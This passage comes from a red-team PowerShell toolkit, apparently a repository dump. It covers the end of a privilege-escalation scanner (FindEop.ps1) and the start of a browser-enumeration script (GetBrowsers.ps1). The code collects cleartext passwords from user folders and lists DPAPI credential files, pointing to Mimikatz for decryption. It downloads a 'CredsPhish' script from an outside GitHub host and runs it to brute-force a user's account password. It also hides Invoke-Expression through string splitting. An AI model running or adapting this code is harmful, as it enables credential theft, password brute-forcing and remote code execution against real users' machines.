\"-----------------\"\r\n#https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dpapi-extracting-passwords\r\nGet-ChildItem -Path \"$Env:APPDATA\\Microsoft\\Protect\" -EA SilentlyContinue|Select-Object Name,LastWriteTime|Format-Table|Out-String -Stream|Select -Skip 1|Select -SkipLast 1\r\nWrite-Host \"Use Mimikatz 'dpapi::cred' module with /masterkey to decrypt!\" -ForeGroundColor Yellow\r\n(Get-ChildItem \"$Env:APPDATA\\Microsoft\\Credentials\" -Attributes Hidden -Force -EA SilentlyContinue).Name\r\n(Get-ChildItem \"$Env:LOCALAPPDATA\\Microsoft\\Credentials\" -Attributes Hidden -Force -EA SilentlyContinue).Name\r\nWrite-Host \"`n\"\r\n\r\n\r\n#hardcoded credentials in text\\xml\\log files\r\nWrite-Host \"HARDCODED CREDENTIALS IN CLEARTEXT?\"\r\nWrite-Host \"-----------------------------------\"\r\nIf(Test-Path -Path \"$Env:USERPROFILE\\Desktop\" -EA SilentlyContinue)\r\n{\r\n #Build credentials dump DataTable!\r\n $credstable = New-Object System.Data.DataTable\r\n $credstable.Columns.Add(\"FileName \")|Out-Null\r\n $credstable.Columns.Add(\"Catched Credentials\")|Out-Null\r\n\r\n Write-Host \"[DIRECTORY] Scanning : '$Env:USERPROFILE\\Desktop'\"\r\n $FilesToScan = (Get-ChildItem \"$Env:USERPROFILE\\Desktop\" -EA SilentlyContinue).FullName|Where-Object {$_ -iMatch '(.log|.txt|.xml)$'}\r\n ForEach($FoundFile in $FilesToScan)\r\n {\r\n $UserCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(Username|User:|user name)'}\r\n If($UserCreds)\r\n {\r\n #Adding values to output DataTable!\r\n $FoundName = $FoundFile.Split('\\\\')[-1]\r\n $credstable.Rows.Add(\"$FoundName\",\"$UserCreds\")|Out-Null\r\n }\r\n\r\n $PassCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(pass|Password|passwd|login)'}\r\n If($PassCreds)\r\n {\r\n #Adding values to output DataTable!\r\n $FoundName = $FoundFile.Split('\\\\')[-1]\r\n $credstable.Rows.Add(\"$FoundName\",\"$PassCreds\")|Out-Null\r\n }\r\n\r\n }\r\n\r\n #Display Output DataTable\r\n $credstable | Format-Table -AutoSize | Out-String -Stream | Select-Object -SkipLast 1 | ForEach-Object {\r\n $stringformat = If($_ -iMatch '^(FileName)')\r\n {\r\n @{ 'ForegroundColor' = 'Green' }\r\n }\r\n Else\r\n {\r\n @{ 'ForegroundColor' = 'White' }\r\n }\r\n Write-Host @stringformat $_\r\n }\r\n\r\n}\r\nElse\r\n{\r\n Write-Host \"[DIRECTORY] NotFound : '$Env:USERPROFILE\\Desktop'\" -ForeGroundColor Red \r\n}\r\n\r\n\r\nIf(Test-Path -Path \"$Env:ONEDRIVE\\Desktop\" -EA SilentlyContinue)\r\n{\r\n #Build credentials dump DataTable!\r\n $credstable = New-Object System.Data.DataTable\r\n $credstable.Columns.Add(\"FileName \")|Out-Null\r\n $credstable.Columns.Add(\"Catched Credentials\")|Out-Null\r\n\r\n Write-Host \"[DIRECTORY] Scanning : '$Env:ONEDRIVE\\Desktop'\"\r\n $FilesToScan = (Get-ChildItem \"$Env:ONEDRIVE\\Desktop\" -EA SilentlyContinue).FullName|Where-Object {$_ -iMatch '(.log|.txt|.xml)$'}\r\n ForEach($FoundFile in $FilesToScan)\r\n {\r\n $UserCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(Username|User:|user name)'}\r\n If($UserCreds)\r\n {\r\n #Adding values to output DataTable!\r\n $FoundName = $FoundFile.Split('\\\\')[-1]\r\n $credstable.Rows.Add(\"$FoundName\",\"$UserCreds\")|Out-Null\r\n }\r\n\r\n $PassCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(pass|Password|passwd|login)'}\r\n If($PassCreds)\r\n {\r\n #Adding values to output DataTable!\r\n $FoundName = $FoundFile.Split('\\\\')[-1]\r\n $credstable.Rows.Add(\"$FoundName\",\"$PassCreds\")|Out-Null\r\n }\r\n\r\n }\r\n\r\n #Display output DataTable\r\n $credstable | Format-Table -AutoSize | Out-String -Stream | Select-Object -SkipLast 1 | ForEach-Object {\r\n $stringformat = If($_ -iMatch '^(FileName)')\r\n {\r\n @{ 'ForegroundColor' = 'Green' }\r\n }\r\n Else\r\n {\r\n @{ 'ForegroundColor' = 'White' }\r\n }\r\n Write-Host @stringformat $_\r\n }\r\n\r\n}\r\nElse\r\n{\r\n Write-Host \"[DIRECTORY] NotFound : '$Env:ONEDRIVE\\Desktop'\" -ForeGroundColor Red \r\n}\r\n\r\n\r\nIf(Test-Path -Path \"$Env:USERPROFILE\\Documents\" -EA SilentlyContinue)\r\n{\r\n #Build credentials dump DataTable!\r\n $credstable = New-Object System.Data.DataTable\r\n $credstable.Columns.Add(\"FileName \")|Out-Null\r\n $credstable.Columns.Add(\"Catched Credentials\")|Out-Null\r\n\r\n Write-Host \"[DIRECTORY] Scanning : '$Env:USERPROFILE\\Documents'\"\r\n $FilesToScan = (Get-ChildItem \"$Env:USERPROFILE\\Documents\" -EA SilentlyContinue).FullName|Where-Object {$_ -iMatch '(.log|.txt|.xml|.ini)$'}\r\n ForEach($FoundFile in $FilesToScan)\r\n {\r\n $UserCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(Username|User:|user name)'}\r\n If($UserCreds)\r\n {\r\n #Adding values to output DataTable!\r\n $FoundName = $FoundFile.Split('\\\\')[-1]\r\n $credstable.Rows.Add(\"$FoundName\",\"$UserCreds\")|Out-Null\r\n }\r\n\r\n $PassCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(pass|Password|passwd|login)'}\r\n If($PassCreds)\r\n {\r\n #Adding values to output DataTable!\r\n $FoundName = $FoundFile.Split('\\\\')[-1]\r\n $credstable.Rows.Add(\"$FoundName\",\"$PassCreds\")|Out-Null\r\n }\r\n\r\n }\r\n\r\n #Display output DataTable\r\n $credstable | Format-Table -AutoSize | Out-String -Stream | Select-Object -SkipLast 1 | ForEach-Object {\r\n $stringformat = If($_ -iMatch '^(FileName)')\r\n {\r\n @{ 'ForegroundColor' = 'Green' }\r\n }\r\n Else\r\n {\r\n @{ 'ForegroundColor' = 'White' }\r\n }\r\n Write-Host @stringformat $_\r\n }\r\n\r\n}\r\nElse\r\n{\r\n Write-Host \"[DIRECTORY] NotFound : '$Env:USERPROFILE\\Documents'\" -ForeGroundColor Red \r\n}\r\n\r\n\r\nIf(Test-Path -Path \"$Env:TMP\" -EA SilentlyContinue)\r\n{\r\n #Build credentials dump DataTable!\r\n $credstable = New-Object System.Data.DataTable\r\n $credstable.Columns.Add(\"FileName \")|Out-Null\r\n $credstable.Columns.Add(\"Catched Credentials\")|Out-Null\r\n\r\n Write-Host \"[DIRECTORY] Scanning : '$Env:TMP'\"\r\n $FilesToScan = (Get-ChildItem \"$Env:TMP\" -EA SilentlyContinue).FullName|Where-Object {$_ -iMatch '(.log|.txt|.xml)$'}\r\n ForEach($FoundFile in $FilesToScan)\r\n {\r\n $UserCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(Username|User:|user name)'}\r\n If($UserCreds)\r\n {\r\n #Adding values to output DataTable!\r\n $FoundName = $FoundFile.Split('\\\\')[-1]\r\n $credstable.Rows.Add(\"$FoundName\",\"$UserCreds\")|Out-Null\r\n }\r\n\r\n $PassCreds = Get-Content -Path \"$FoundFile\" -EA SilentlyContinue|Where-Object {$_ -iMatch '(pass|Password|passwd)'}\r\n If($PassCreds)\r\n {\r\n #Adding values to output DataTable!\r\n $FoundName = $FoundFile.Split('\\\\')[-1]\r\n $credstable.Rows.Add(\"$FoundName\",\"$PassCreds\")|Out-Null\r\n }\r\n\r\n }\r\n\r\n #Display output DataTable\r\n $credstable | Format-Table -AutoSize | Out-String -Stream | Select-Object -SkipLast 1 | ForEach-Object {\r\n $stringformat = If($_ -iMatch '^(FileName)')\r\n {\r\n @{ 'ForegroundColor' = 'Green' }\r\n }\r\n Else\r\n {\r\n @{ 'ForegroundColor' = 'White' }\r\n }\r\n Write-Host @stringformat $_\r\n }\r\n\r\n}\r\nElse\r\n{\r\n Write-Host \"[DIRECTORY] NotFound : '$Env:TMP'\" -ForeGroundColor Red \r\n}\r\n\r\n\r\n#return to pwd\r\ncd $LocalPath\r\nWrite-Host \"\"\r\n\r\n\r\n#FINAL TESTS USING SHERLOCK CMDLET\r\nIf($verb -ieq \"False\")\r\n{\r\n Import-Module -Name \"$Env:TMP\\Sherlock.ps1\" -Force;Find-AllVulns\r\n}\r\nElse\r\n{\r\n #NOTE: FindEop.ps1 -verb 'true' - triggers dll-hijacking checks\r\n Import-Module -Name \"$Env:TMP\\Sherlock.ps1\" -Force;Get-DllHijack;Find-AllVulns\r\n}\r\nRemove-Item -Path \"$Env:TMP\\Sherlock.ps1\" -Force -ErrorAction SilentlyContinue\r\n\r\n\r\n#Define Batch title again because sherlock.ps1 changed it ..\r\n$host.UI.RawUI.WindowTitle = \"@FindEop $BatVersion {SSA RedTeam @2022}\"\r\n\r\n\r\nIf($BruteForce -ne \"false\")\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Brute force user accounts passwords\r\n\r\n .EXAMPLE\r\n PS C:\\> .\\FindEop.ps1 -bruteforce 'true'\r\n Scans for EOP and brute force user account pass\r\n\r\n .EXAMPLE\r\n PS C:\\> .\\FindEop.ps1 -bruteforce 'pedro'\r\n Scans for EOP and brute force pedro account pass\r\n #>\r\n\r\n #Define the type of scan\r\n If($BruteForce -ne \"true\")\r\n {\r\n #User input account name\r\n $UserAccountName = \"$BruteForce\"\r\n }\r\n Else\r\n {\r\n #Auto brute the active user account name\r\n $UserAccountName = $([Environment]::UserName)\r\n }\r\n\r\n Write-Host \"`nBRUTE FORCING '$UserAccountName' USER ACCOUNT\"\r\n Write-Host \"[i] Dicionary file contains '59.186' passwords.\" -ForegroundColor Yellow\r\n Write-Host \"-----------------------------------------------\"\r\n #Download auxiliary cmdlet from my GitHub into %tmp% directory\r\n iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/modules/CredsPhish.ps1\" -OutFile \"$Env:TMP\\CredsPhish.ps1\"|Unblock-File\r\n If(Test-Path -Path \"$Env:TMP\\CredsPhish.ps1\" -EA SilentlyContinue)\r\n {\r\n powershell -File \"$Env:TMP\\CredsPhish.ps1\" -PhishCreds Brute -Dicionary \"$Env:TMP\\passwords.txt\" -UserAccount \"$UserAccountName\"\r\n Remove-Item -Path \"$Env:TMP\\CredsPhish.ps1\" -EA SilentlyContinue -Force\r\n }\r\n Else\r\n {\r\n Write-Host \"[ERROR] Fail to download '$Env:TMP\\CredsPhish.ps1'\" -ForegroundColor Red -BackgroundColor Black\r\n }\r\n\r\n}\r\n\r\nexit" }, { "path": "mimiRatz/GetBrowsers.ps1", "content": "\r\n$Path = $null\r\n$mpset = $False\r\n$RUIUIUi0 = 'no'\r\n$cmdletver = \"1.20.7\"\r\n$IPATH = ($pwd).Path.ToString()\r\n$param1 = $args[0] # User Inputs [Arguments]\r\n$param2 = $args[1] # User Inputs [Arguments]\r\n$host.UI.RawUI.WindowTitle = \"@GetBrowsers v$cmdletver\"\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n\r\n## Auto-Set @Args in case of User empty inputs (Set LogFile Path).\r\nIf(-not($param2)){$LogFilePath = \"$env:TMP\"}else{If($param2 -match '^[0-9]'){$LogFilePath = \"$env:TMP\";$param2 = $param2}else{$LogFilePath = \"$param2\";$mpset = $True}}\r\nIf(-not($param1)){\r\n ## Required (Mandatory) Parameters/args Settings\r\n echo \"`nGetBrowsers - Enumerate installed browser(s) information .\" > $LogFilePath\\BrowserEnum.log\r\n echo \"[ ERROR ] This script requires parameters (-args) to run ..`n\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"Syntax: [scriptname] [-arg <mandatory>] [arg <optional>]`n\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"The following mandatory args are available:\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"./GetBrowsers.ps1 -RECON Fast recon (browsers versions interface)\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"./GetBrowsers.ps1 -WINVER Enumerates remote sys default settings.\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"./GetBrowsers.ps1 -IE Enumerates IE browser information Only.\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"./GetBrowsers.ps1 -ALL Enumerates IE, Firefox, Chrome information.\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"./GetBrowsers.ps1 -CHROME Enumerates Chrome browser information Only.\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"./GetBrowsers.ps1 -FIREFOX Enumerates Firefox browser information Only.\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"./GetBrowsers.ps1 -OPERA Enumerates Opera browser information Only.\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"./GetBrowsers.ps1 -ADDONS Enumerates ALL browsers extentions installed.\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"./GetBrowsers.ps1 -CLEAN Enumerates|Delete ALL browsers cache files.`n\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"The following Optional args are available:\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"./GetBrowsers.ps1 -IE `$env:TMP Enumerates browser and stores logfile to 'tmp'.\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"./GetBrowsers.ps1 -SCAN 135,139,445 Enumerates local|remote host open|closed tcp ports.`n\" >> $LogFilePath\\BrowserEnum.log\r\n Get-Content $LogFilePath\\BrowserEnum.log;Remove-Item $LogFilePath\\BrowserEnum.log -Force\r\n ## For those who insiste in running this script outside meterpeter\r\n If(-not(Test-Path \"$env:tmp\\Update-KB4524147.ps1\")){\r\n Start-Sleep -Seconds 6\r\n }\r\n Exit\r\n}\r\n\r\n\r\n## [GetBrowsers] PS Script Banner (Manual Run)\r\n# For those who insiste in running this script outside meterpeter\r\n#Write-Host \"GetBrowsers - Enumerate installed browser(s) information.\" -ForeGroundColor Green\r\nIf($mpset -eq $True){Write-Host \"[i] LogFile => $LogFilePath\\BrowserEnum.log\" -ForeGroundColor yellow}\r\nStart-sleep -Seconds 1\r\n\r\nIf($param1 -ne \"-CLEAN\" -or $param1 -ne \"-clean\")\r\n{\r\n ## Get Default network interface\r\n $DefaultInterface = Test-NetConnection -ErrorAction SilentlyContinue|Select-Object -expandproperty InterfaceAlias\r\n If(-not($DefaultInterface) -or $DefaultInterface -eq $null){$DefaultInterface = \"{null}\"}\r\n\r\n ## Get System Default Configurations\r\n $RHserver = \"LogonServer : \"+\"$env:LOGONSERVER\"\r\n $Caption = Get-CimInstance Win32_OperatingSystem|Format-List *|findstr /I /B /C:\"Caption\"\r\n If($Caption){$ParseCap = $Caption -replace ' :',' :'}else{$ParseCap = \"Caption : Not Found\"}\r\n\r\n ## Get System Default webBrowser\r\n $DefaultBrowser = (Get-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\https\\UserChoice' -ErrorAction SilentlyContinue).ProgId\r\n If($DefaultBrowser){$Parse_Browser_Data = $DefaultBrowser.split(\"-\")[0] -replace 'URL','' -replace 'HTML','' -replace '.HTTPS',''}else{$Parse_Browser_Data = \"Not Found\"}\r\n $MInvocation = \"WebBrowser : \"+\"$Parse_Browser_Data\"+\" (PreDefined)\";\r\n\r\n ## Get System UserAgent string\r\n $IntSet = Get-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\internet settings\" -Name 'User Agent' -ErrorAction SilentlyContinue|Select-Object 'User Agent'\r\n If($IntSet){$ParsingIntSet = $IntSet -replace '@{User Agent=','UserAgent : ' -replace '}',''}else{$ParsingIntSet = \"UserAgent : Not Found\"}\r\n\r\n ## Get Default Gateway IpAddress (IPV4)\r\n $RGateway = (Get-NetIPConfiguration|Foreach IPv4DefaultGateway -ErrorAction SilentlyContinue).NextHop\r\n If(-not($RGateway) -or $RGateway -eq $null){$RGateway = \"{null}\"}\r\n $nwINFO = Get-WmiObject -ComputerName (hostname) Win32_NetworkAdapterConfiguration|Where-Object { $_.IPAddress -ne $null }\r\n $DHCPName = $nwINFO.DHCPEnabled;$ServiceName = $nwINFO.ServiceName\r\n\r\n ## Internet statistics\r\n $recstats = netstat -s -p IP|select-string -pattern \"Packets Received\"\r\n If($recstats){$statsdata = $recstats -replace ' Packets Received =','TCPReceived :'}else{$statsdata = \"TCPReceived : {null}\"}\r\n $delstats = netstat -s -p IP|select-string -pattern \"Packets Delivered\"\r\n If($delstats){$deliverdata = $delstats -replace ' Received Packets Delivered =','TCPDelivered :'}else{$deliverdata = \"TCPDelivered : {null}\"}\r\n\r\n\r\n ## Writting LogFile to the selected path in: { $param2 var }\r\n echo \"`n`nSystem Defaults\" > $LogFilePath\\BrowserEnum.log\r\n echo \"---------------\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"DHCPEnabled : $DHCPName\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"Interface : $DefaultInterface\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"ServiceName : $ServiceName\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$RHserver\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$ParseCap\" >> $LogFilePath\\BrowserEnum.log \r\n echo \"$ParsingIntSet\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n ## Get Flash Internal Name/Version\r\n If(-not(Test-Path \"$env:WINDIR\\system32\\macromed\\flash\\flash.ocx\")){\r\n echo \"flashName : Not Found\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $flash = Get-Item \"$env:WINDIR\\system32\\macromed\\flash\\flash.ocx\"|select *\r\n $flashName = $flash.versioninfo.InternalName\r\n echo \"flashName : $flashName\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n echo \"$MInvocation\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"Gateway : $RGateway\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$statsdata\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$deliverdata\" >> $LogFilePath\\BrowserEnum.log\r\n ## END Off { @args -WINVER }\r\n}\r\n\r\n\r\nfunction ConvertFrom-Json20([object] $item){\r\n $RawString = \"Ad\"+\"d-Ty\"+\"pe -Ass\"+\"emblyNa\"+\"me System.W\"+\"eb.Ext\"+\"ensions\" -Join ''\r\n $JavaSerial = \"System.W\"+\"eb.Scri\"+\"pt.Serial\"+\"ization.Jav\"+\"aScriptSe\"+\"rializer\" -Join ''\r\n $RawString|&('Sex' -replace 'S','I')\r\n $powers_js = New-Object $JavaSerial\r\n return ,$powers_js.DeserializeObject($item) \r\n}\r\n\r\nfunction BROWSER_RECON {\r\n\r\n #Build output DataTable!\r\n $datatable = New-Object System.Data.DataTable\r\n $datatable.Columns.Add(\"Browser\")|Out-Null\r\n $datatable.Columns.Add(\"Install\")|Out-Null\r\n $datatable.Columns.Add(\"Status\")|Out-Null\r\n $datatable.Columns.Add(\"Version\")|Out-Null\r\n $datatable.Columns.Add(\"PreDefined\")|Out-Null\r\n\r\n ## New MicrosoftEdge Update have changed the binary name to 'msedge' ..\r\n $fpatth = \"HKLM:\\SOFT\"+\"WARE\\Microsoft\\In\"+\"ternet Explorer\" -join ''\r\n $CheckVersion = (Get-ItemProperty -Path \"$fpatth\" -EA SilentlyContinue).version.ToString()\r\n If($CheckVersion -lt '9.11.18362.0'){$ProcessName = \"MicrosoftEdge\"}else{$ProcessName = \"msedge\"}\r\n $IETestings = (Get-Process $ProcessName -ErrorAction SilentlyContinue).Responding\r\n If($IETestings -eq $True){$iStatus = \"Active\"}else{$iStatus = \"Stoped\"}\r\n $FFTestings = (Get-Process firefox -ErrorAction SilentlyContinue).Responding\r\n If($FFTestings -eq $True){$fStatus = \"Active\"}else{$fStatus = \"Stoped\"}\r\n $CHTestings = (Get-Process chrome -ErrorAction SilentlyContinue).Responding\r\n If($CHTestings -eq $True){$cStatus = \"Active\"}else{$cStatus = \"Stoped\"}\r\n $OStatus = (Get-Process opera -ErrorAction SilentlyContinue).Responding\r\n If($OStatus -eq $True){$OStatus = \"Active\"}else{$OStatus = \"Stoped\"}\r\n $sfStatus = (Get-Process safari -ErrorAction SilentlyContinue).Responding\r\n If($sfStatus -eq $True){$sfStatus = \"Active\"}else{$sfStatus = \"Stoped\"}\r\n $BrStatus = (Get-Process brave -ErrorAction SilentlyContinue).Responding\r\n If($BrStatus -eq $True){$BrStatus = \"Active\"}else{$BrStatus = \"Stoped\"}\r\n\r\n ## Detect ALL Available browsers Installed and the PreDefined browser name\r\n $DefaultBrowser = (Get-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\https\\UserChoice' -ErrorAction SilentlyContinue).ProgId\r\n If($DefaultBrowser){$MInvocation = $DefaultBrowser.split(\"-\")[0] -replace 'URL','' -replace 'HTML','' -replace '.HTTPS',''}else{$MInvocation = $null}\r\n $IEVersion = (Get-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer\" -ErrorAction SilentlyContinue).version\r\n If($IEVersion){$IEfound = \"Found\"}else{$IEfound = \"False\";$IEVersion = \"{null}\"}\r\n $Chrome_App = (Get-ItemProperty \"HKCU:\\Software\\Google\\Chrome\\BLBeacon\" -ErrorAction SilentlyContinue).version\r\n If($Chrome_App){$CHfound = \"Found\"}else{$CHfound = \"False\";$Chrome_App = \"{null}\"}\r\n $SafariData = (Get-ChildItem -Path \"${Env:PROGRAMFILES(X86)}\\Safari\\Safari.exe\" -EA SilentlyContinue).VersionInfo.ProductVersion.ToString()\r\n If($SafariData){$SFfound = \"Found\"}else{$SFfound = \"False\";$SafariData = \"{null}\"}\r\n $BraveData = (Get-ChildItem -Path \"$Env:PROGRAMFILES\\BraveSoftware\\Brave-Browser\\Application\\brave.exe\" -EA SilentlyContinue).VersionInfo.ProductVersion.ToString()\r\n If($BraveData){$Brfound = \"Found\"}else{$Brfound = \"False\";$BraveData = \"{null}\"}\r\n\r\n #Check Opera versions number\r\n If($MInvocation -iMatch 'Opera')\r\n {\r\n $OPfound = \"Found\"\r\n If(Test-Path -Path \"$Env:LOCALAPPDATA\\Programs\" -Filter \"Opera???\" -EA SilentlyContinue)\r\n {\r\n $OPData = (Get-ChildItem -Path \"$Env:LOCALAPPDATA\\Programs\\Opera???\\launcher.exe\").VersionInfo.ProductVersion.ToString()\r\n }\r\n Else{$OPData = \"{null}\"}\r\n }\r\n Else\r\n {\r\n $OPfound = \"False\"\r\n }\r\n\r\n\r\n ## display predefined browser status\r\n If($MInvocation -iMatch 'IE'){$id = \"True\";$fd = \"False\";$cd = \"False\";$OP = \"False\";$SF = \"False\";$Br = \"False\"}\r\n If($MInvocation -iMatch 'brave'){$id = \"False\";$fd = \"False\";$cd = \"False\";$OP = \"False\";$SF = \"False\";$Br = \"True\"}\r\n If($MInvocation -iMatch 'Opera'){$id = \"False\";$fd = \"False\";$cd = \"False\";$OP = \"True\";$SF = \"False\";$Br = \"False\"}\r\n If($MInvocation -iMatch 'Safari'){$id = \"False\";$fd = \"False\";$cd = \"False\";$OP = \"False\";$SF = \"True\";$Br = \"False\"}\r\n If($MInvocation -iMatch 'Chrome'){$id = \"False\";$fd = \"False\";$cd = \"True\";$OP = \"False\";$SF = \"False\";$Br = \"False\"}\r\n If($MInvocation -iMatch 'Firefox'){$id = \"False\";$fd = \"True\";$cd = \"False\";$OP = \"False\";$SF = \"False\";$Br = \"False\"}\r\n If($MInvocation -iMatch 'MSEdgeHTM'){$id = \"True\";$fd = \"False\";$cd = \"False\";$OP = \"False\";$SF = \"False\";$Br = \"False\"}\r\n If(-not($MInvocation) -or $MInvocation -eq $null){$id = \"{Null}\";$fd = \"{Null}\";$cd = \"{Null}\";$OP = \"{Null}\";$SF = \"{Null}\";$Br = \"{Null}\"}\r\n\r\n ## leak Firefox installed version\r\n If(-not(Test-Path -Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\"))\r\n {\r\n $FFfound = \"False\";\r\n $ParsingData = \"{null}\"\r\n }\r\n Else\r\n {\r\n $FFfound = \"Found\"\r\n If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\prefs.js\"))\r\n {\r\n If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\prefs.js\"))\r\n {\r\n $ParsingData = \"{null}\"\r\n }\r\n Else\r\n {\r\n $Preferencies = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\prefs.js\"\r\n $JsPrefs = Get-content $Preferencies|Select-String \"extensions.lastPlatformVersion\"\r\n $ParsingData = $JsPrefs[0] -replace 'user_pref\\(','' -replace '\\\"','' -replace ',','' -replace '\\);','' -replace 'extensions.lastPlatformVersion','' -replace ' ',''\r\n }\r\n }\r\n Else\r\n {\r\n $Preferencies = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\prefs.js\"\r\n $JsPrefs = Get-content $Preferencies|Select-String \"extensions.lastPlatformVersion\"\r\n $ParsingData = $JsPrefs[0] -replace 'user_pref\\(','' -replace '\\\"','' -replace ',','' -replace '\\);','' -replace 'extensions.lastPlatformVersion','' -replace ' ',''\r\n }\r\n }\r\n\r\n #Adding values to output DataTable!\r\n $ParsingData = (gp HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |Select DisplayName, DisplayVersion|?{$_.DisplayName -iMatch 'Firefox'}).DisplayVersion\r\n $datatable.Rows.Add(\"IE\",\"$IEfound\",\"$iStatus\",\"$IEVersion\",\"$id\")|Out-Null\r\n $datatable.Rows.Add(\"CHROME\",\"$CHfound\",\"$cStatus\",\"$Chrome_App\",\"$cd\")|Out-Null\r\n $datatable.Rows.Add(\"FIREFOX\",\"$FFfound\",\"$fStatus\",\"$ParsingData\",\"$fd\")|Out-Null\r\n $datatable.Rows.Add(\"OPERA\",\"$OPfound\",\"$OStatus\",\"$OPData\",\"$OP\")|Out-Null\r\n $datatable.Rows.Add(\"SAFARI\",\"$SFfound\",\"$sfStatus\",\"$SafariData\",\"$SF\")|Out-Null\r\n $datatable.Rows.Add(\"BRAVE\",\"$Brfound\",\"$BrStatus\",\"$BraveData\",\"$Br\")|Out-Null\r\n $datatable|Format-Table -AutoSize|Out-File -FilePath \"$LogFilePath\\BrowserEnum.log\" -Force\r\n\r\n ## Get-NetAdapter { Interfaces Available }\r\n $Interfaces = Get-NetAdapter | Select-Object Status,InterfaceDescription -EA SilentlyContinue\r\n If($Interfaces){echo $Interfaces >> $LogFilePath\\BrowserEnum.log}\r\n}\r\n\r\n\r\nfunction OPERA {\r\n ## Retrieve Opera Browser Information\r\n echo \"`n`nOpera Browser\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"-------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n ## Set the Location of Opera prefs.js file\r\n If(Test-Path \"$Env:LOCALAPPDATA\\Programs\\Opera???\\installer_prefs.json\")\r\n {\r\n ## Check browser: { active|StartTime|PID } Settings\r\n $FFTestings = (Get-Process Opera -ErrorAction SilentlyContinue).Responding\r\n If($FFTestings -eq $True){\r\n $Status = \"Status : Active\"\r\n $BsT = Get-Process Opera|Select -ExpandProperty StartTime\r\n $StartTime = $BsT[0];$FinalOut = \"StartTime : $StartTime\"\r\n $PPID = (Get-Process Opera|Select -Last 1).Id\r\n\r\n echo \"$Status\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$FinalOut\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"Process PID : $PPID\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $Status = \"Status : Stoped\"\r\n $PSID = \"Process PID : {requires Opera process running}\"\r\n $FinalOut = \"StartTime : {requires Opera process running}\"\r\n echo \"$Status\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$FinalOut\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$PSID\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n ## Get Browser Version { 76.0.11 }\r\n $OperaVersionData = (Get-ChildItem -Path \"$Env:LOCALAPPDATA\\Programs\\Opera???\\launcher.exe\").VersionInfo.ProductVersion.ToString()\r\n If($OperaVersionData)\r\n {\r\n echo \"Version : $OperaVersionData\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n Else\r\n {\r\n echo \"Version : {fail retriving version from launcher.exe}\" >> $LogFilePath\\BrowserEnum.log \r\n }\r\n\r\n ## Get Opera.exe binary path\r\n $BinaryPath = Get-Process Opera -EA SilentlyContinue|Select -Last 1\r\n If(-not($BinaryPath) -or $BinaryPath -eq $null)\r\n {\r\n echo \"BinaryPath : {requires Opera process running}\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n Else\r\n {\r\n $BinaryPath = Get-Process Opera|Select -ExpandProperty Path\r\n $parseData = $BinaryPath[0]\r\n echo \"BinaryPath : $parseData\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n ## Get brownser startup page { https://www.google.pt }\r\n $JsPrefs = Get-content \"$Env:LOCALAPPDATA\\Programs\\Opera???\\installer_prefs.json\" -EA SilentlyContinue\r\n If($JsPrefs)\r\n {\r\n $ParseData = $JsPrefs -split(',');$Strip = $ParseData[38]\r\n $ParsingData = $Strip -replace '\\\"}','' -replace '\"}','' -replace '\\\"welcome-url\\\":\\\"','HomePage : '\r\n echo 